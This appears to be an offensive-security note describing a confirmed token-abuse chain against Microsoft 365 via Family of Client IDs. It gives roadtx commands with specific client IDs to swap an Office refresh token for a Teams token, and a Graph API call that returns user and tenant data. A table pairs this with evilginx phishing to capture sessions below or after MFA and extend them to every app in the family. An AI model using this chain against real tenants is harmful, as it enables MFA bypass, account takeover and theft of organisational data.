FOCI Token Chain
Family of Client IDs — confirmed S40 — MS Office token to Teams to Graph API 200
What FOCI Is
Microsoft's Family of Client IDs allows a refresh token obtained for one Microsoft client app to be exchanged for an access token for any other app in the same family — without re-authentication, MFA, or user notification.
Confirmed Chain
# Authenticate with MS Office client ID
roadtx auth -c d3590ed6-52b3-4102-aeff-aad2292ab01c -r https://graph.microsoft.com
# Exchange for Teams
roadtx gettokens --refresh-token TOKEN -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 -r https://graph.microsoft.com
# Call Graph API
curl -H "Authorization: Bearer ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me
# Returns 200 — profile, org, tenant data, user enumerationThree Attack Layers
| Layer | Condition | What happens |
|---|---|---|
| 1 | No Conditional Access policy | evilginx operates below MFA threshold — MFA never fires |
| 2 | MFA enabled + Conditional Access | evilginx captures session after MFA completes — proof of MFA stolen |
| 3 | Any captured session | FOCI extends token to all apps victim never visited |
One Truth
The lock does not protect the room if you can wait at the door and take the key from whoever just unlocked it.